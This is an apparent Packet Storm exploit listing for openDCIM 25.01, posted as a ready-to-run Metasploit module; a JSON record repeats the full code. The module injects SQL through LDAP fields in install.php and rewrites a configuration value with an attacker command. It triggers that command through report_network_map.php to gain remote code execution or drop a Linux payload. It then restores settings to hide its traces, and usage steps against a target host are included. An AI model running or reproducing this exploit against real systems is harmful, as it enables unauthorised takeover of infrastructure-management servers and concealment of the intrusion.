📄 openDCIM 25.01 SQL Injection / Remote Code Execution

Description

openDCIM version 25.01 remote SQL injection exploit that achieves remote code execution...

Basic Information

ID PACKETSTORM:219185

Published Apr 20, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : openDCIM 25.01 SQL Injection Leading to Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://opendcim.org/downloads.html |
==================================================================================================================================

[+] Summary : This Metasploit module targets a logical SQL Injection vulnerability in the install.php endpoint of openDCIM, which can be escalated to Remote Code Execution (RCE).

The exploit workflow includes:

A timing-based SQL injection check using SLEEP() to confirm vulnerability.
Injection into LDAP-related configuration fields stored in the database.
Creation of a temporary backup table to preserve existing configuration values.
Manipulation (“poisoning”) of a configuration parameter (dot) to inject system commands.
Triggering execution through a web request to report_network_map.php.
Supporting two attack modes:
Command shell execution (cmd)
Payload dropper for Linux systems

[+] The module also implements:

Configuration backup before exploitation
Automatic restoration of settings after execution to reduce impact traces

[+] How to Save & Run (Metasploit Module):

Save the module: open_dcim_sqli_rce.rb
Move it into Metasploit local path: ~/.msf4/modules/exploits/multi/http/
Start Metasploit: msfconsole
Load the module: use exploit/multi/http/open_dcim_sqli_rce
Set options:
set RHOSTS <target_ip>
set TARGETURI /
Run the exploit:
run

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'openDCIM install.php SQL Injection to RCE',
'Description' => %q{
SQLi -> RCE via openDCIM install.php (logical fixed version).
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'Targets' => [
[
'Unix/Linux Command Shell', {
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD,
'Type' => :cmd
}
],
[
'Linux Dropper', {
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'CmdStagerFlavor' => ['printf', 'bourne'],
'Type' => :dropper
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2026-02-28'
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

LDAP_FIELDS = %w[
LDAPServer LDAPBaseDN LDAPBindDN LDAPSessionExpiration
LDAPSiteAccess LDAPReadAccess LDAPWriteAccess LDAPDeleteAccess
LDAPAdminOwnDevices LDAPRackRequest LDAPRackAdmin
LDAPContactAdmin LDAPSiteAdmin
].freeze

DOT_PARAM = 'dot'.freeze

def install_uri
normalize_uri(target_uri.path, 'install.php')
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => install_uri
)

return CheckCode::Unknown unless res
return CheckCode::Safe unless res.code == 200

return CheckCode::Safe unless res.body.include?('install') || res.body.include?('openDCIM')

print_status('Testing SQL injection timing')

3.times do |i|
sleep_time = 2

elapsed_time = Rex::Stopwatch.elapsed_time do
send_request_cgi(
'method' => 'POST',
'uri' => install_uri,
'vars_post' => {
'ldapaction' => 'Set',
'LDAPServer' => "'; SELECT SLEEP(#{sleep_time}); -- "
}
)
end

print_status("Test #{i + 1}: #{elapsed_time.round(2)}s")

if elapsed_time < sleep_time
return CheckCode::Safe('Timing condition not met')
end
end

CheckCode::Vulnerable
end

def exploit
@backup_table = Rex::Text.rand_text_alpha(8).downcase

fail_with(Failure::UnexpectedReply, 'Backup failed') unless backup_config

case target['Type']
when :cmd
fail_with(Failure::UnexpectedReply, 'Poison failed') unless poison_dot(payload.encoded)
trigger_exec
when :dropper
execute_cmdstager
end
ensure
cleanup_config
end

def execute_command(cmd, _opts = {})
fail_with(Failure::UnexpectedReply, 'Poison failed') unless poison_dot(cmd)
trigger_exec
end

def trigger_exec
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'report_network_map.php'),
'vars_get' => { 'format' => '0', 'containerid' => '1' }
)
end

def inject_sql(field, sql)
form = { 'ldapaction' => 'Set' }

LDAP_FIELDS.each do |f|
form[f] = ''
end

form[field] = "'; #{sql}; -- "

res = send_request_cgi(
'method' => 'POST',
'uri' => install_uri,
'vars_post' => form
)

res && [200, 302].include?(res.code)
end

def backup_config
inject_sql(
'LDAPServer',
"DROP TABLE IF EXISTS #{@backup_table};
CREATE TABLE #{@backup_table} AS
SELECT Parameter, Value FROM fac_Config
WHERE Parameter LIKE 'LDAP%' OR Parameter='#{DOT_PARAM}'"
)
end

def poison_dot(value)
safe = value.to_s.gsub('"', '\"')
inject_sql('LDAPBaseDN',
"UPDATE fac_Config SET Value=\"#{safe}\" WHERE Parameter='#{DOT_PARAM}'")
end

def restore_config
inject_sql(
'LDAPSiteAdmin',
"UPDATE fac_Config c
INNER JOIN #{@backup_table} b
ON c.Parameter=b.Parameter
SET c.Value=b.Value;
DROP TABLE IF EXISTS #{@backup_table}"
)
end

def cleanup_config
return unless @backup_table

print_status('Restoring configuration...')
restore_config
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-20T15:53:19",
    "description": "openDCIM version 25.01 remote SQL injection exploit that achieves remote code execution...",
    "published": "2026-04-20T00:00:00",
    "modified": "2026-04-20T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 openDCIM 25.01 SQL Injection / Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219185",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : openDCIM 25.01 SQL Injection Leading to Remote Code Execution                                                    |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://opendcim.org/downloads.html                                                                              |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Metasploit module targets a logical SQL Injection vulnerability in the install.php endpoint of openDCIM, which can be escalated to Remote Code Execution (RCE).\n    \n    The exploit workflow includes:\n    \n    A timing-based SQL injection check using SLEEP() to confirm vulnerability.\n    Injection into LDAP-related configuration fields stored in the database.\n    Creation of a temporary backup table to preserve existing configuration values.\n    Manipulation (\u201cpoisoning\u201d) of a configuration parameter (dot) to inject system commands.\n    Triggering execution through a web request to report_network_map.php.\n    Supporting two attack modes:\n    Command shell execution (cmd)\n    Payload dropper for Linux systems\n    \n    [+] The module also implements:\n    \n    Configuration backup before exploitation\n    Automatic restoration of settings after execution to reduce impact traces\n    \n    [+] How to Save & Run (Metasploit Module):\n    \n    Save the module: open_dcim_sqli_rce.rb\n    Move it into Metasploit local path: ~/.msf4/modules/exploits/multi/http/\n    Start Metasploit: msfconsole\n    Load the module: use exploit/multi/http/open_dcim_sqli_rce\n    Set options:\n    set RHOSTS <target_ip>\n    set TARGETURI /\n    Run the exploit:\n    run\n    \n    [+] POC   :  \n    \n    ##\n    # This module requires Metasploit: https://metasploit.com/download\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::CmdStager\n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'openDCIM install.php SQL Injection to RCE',\n            'Description' => %q{\n              SQLi -> RCE via openDCIM install.php (logical fixed version).\n            },\n            'Author' => ['indoushka'],\n            'License' => MSF_LICENSE,\n            'Targets' => [\n              [\n                'Unix/Linux Command Shell', {\n                  'Platform' => %w[unix linux],\n                  'Arch' => ARCH_CMD,\n                  'Type' => :cmd\n                }\n              ],\n              [\n                'Linux Dropper', {\n                  'Platform' => 'linux',\n                  'Arch' => [ARCH_X86, ARCH_X64],\n                  'CmdStagerFlavor' => ['printf', 'bourne'],\n                  'Type' => :dropper\n                }\n              ]\n            ],\n            'DefaultTarget' => 0,\n            'DisclosureDate' => '2026-02-28'\n          )\n        )\n    \n        register_options([\n          OptString.new('TARGETURI', [true, 'Base path', '/'])\n        ])\n      end\n    \n      LDAP_FIELDS = %w[\n        LDAPServer LDAPBaseDN LDAPBindDN LDAPSessionExpiration\n        LDAPSiteAccess LDAPReadAccess LDAPWriteAccess LDAPDeleteAccess\n        LDAPAdminOwnDevices LDAPRackRequest LDAPRackAdmin\n        LDAPContactAdmin LDAPSiteAdmin\n      ].freeze\n    \n      DOT_PARAM = 'dot'.freeze\n    \n      def install_uri\n        normalize_uri(target_uri.path, 'install.php')\n      end\n    \n      def check\n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => install_uri\n        )\n    \n        return CheckCode::Unknown unless res\n        return CheckCode::Safe unless res.code == 200\n    \n        return CheckCode::Safe unless res.body.include?('install') || res.body.include?('openDCIM')\n    \n        print_status('Testing SQL injection timing')\n    \n        3.times do |i|\n          sleep_time = 2\n    \n          elapsed_time = Rex::Stopwatch.elapsed_time do\n            send_request_cgi(\n              'method' => 'POST',\n              'uri' => install_uri,\n              'vars_post' => {\n                'ldapaction' => 'Set',\n                'LDAPServer' => \"'; SELECT SLEEP(#{sleep_time}); -- \"\n              }\n            )\n          end\n    \n          print_status(\"Test #{i + 1}: #{elapsed_time.round(2)}s\")\n    \n          if elapsed_time < sleep_time\n            return CheckCode::Safe('Timing condition not met')\n          end\n        end\n    \n        CheckCode::Vulnerable\n      end\n    \n      def exploit\n        @backup_table = Rex::Text.rand_text_alpha(8).downcase\n    \n        fail_with(Failure::UnexpectedReply, 'Backup failed') unless backup_config\n    \n        case target['Type']\n        when :cmd\n          fail_with(Failure::UnexpectedReply, 'Poison failed') unless poison_dot(payload.encoded)\n          trigger_exec\n        when :dropper\n          execute_cmdstager\n        end\n      ensure\n        cleanup_config\n      end\n    \n      def execute_command(cmd, _opts = {})\n        fail_with(Failure::UnexpectedReply, 'Poison failed') unless poison_dot(cmd)\n        trigger_exec\n      end\n    \n      def trigger_exec\n        send_request_cgi(\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, 'report_network_map.php'),\n          'vars_get' => { 'format' => '0', 'containerid' => '1' }\n        )\n      end\n    \n      def inject_sql(field, sql)\n        form = { 'ldapaction' => 'Set' }\n    \n        LDAP_FIELDS.each do |f|\n          form[f] = ''\n        end\n    \n        form[field] = \"'; #{sql}; -- \"\n    \n        res = send_request_cgi(\n          'method' => 'POST',\n          'uri' => install_uri,\n          'vars_post' => form\n        )\n    \n        res && [200, 302].include?(res.code)\n      end\n    \n      def backup_config\n        inject_sql(\n          'LDAPServer',\n          \"DROP TABLE IF EXISTS #{@backup_table};\n           CREATE TABLE #{@backup_table} AS\n           SELECT Parameter, Value FROM fac_Config\n           WHERE Parameter LIKE 'LDAP%' OR Parameter='#{DOT_PARAM}'\"\n        )\n      end\n    \n      def poison_dot(value)\n        safe = value.to_s.gsub('\"', '\\\"')\n        inject_sql('LDAPBaseDN',\n                   \"UPDATE fac_Config SET Value=\\\"#{safe}\\\" WHERE Parameter='#{DOT_PARAM}'\")\n      end\n    \n      def restore_config\n        inject_sql(\n          'LDAPSiteAdmin',\n          \"UPDATE fac_Config c\n           INNER JOIN #{@backup_table} b\n           ON c.Parameter=b.Parameter\n           SET c.Value=b.Value;\n           DROP TABLE IF EXISTS #{@backup_table}\"\n        )\n      end\n    \n      def cleanup_config\n        return unless @backup_table\n    \n        print_status('Restoring configuration...')\n        restore_config\n      end\n    end\n    \n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219185",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219185/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 openDCIM 25.01 SQL Injection / Remote Code Execution_PACKETSTORM:219185

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply